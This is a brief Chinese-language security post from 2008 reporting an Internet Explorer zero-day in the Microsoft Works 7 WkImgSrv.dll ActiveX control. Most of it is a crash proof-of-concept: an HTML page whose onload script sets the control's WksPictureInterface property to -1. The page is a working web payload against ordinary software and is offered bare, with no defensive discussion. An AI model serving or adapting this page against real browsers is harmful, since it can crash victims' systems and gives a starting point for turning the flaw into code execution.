IE 0day漏洞 问题出自MS Works
来源:岁月联盟
时间:2008-04-21
影响的DLL版本:Microsoft Works 7 WkImgSrv.dll (7.03.0616.0)
以下为crash POC
<html>
<head>
<title>Microsoft Works 7 WkImgSrv.dll crash POC</title>
<script language=”JavaScript”>
function payload() {
var num = -1;
obj.WksPictureInterface = num;
}
</script>
</head>
<body onload=”JavaScript: return payload();”>
<object classid=”clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6″ id=”obj”>
</object>
</body>
</html>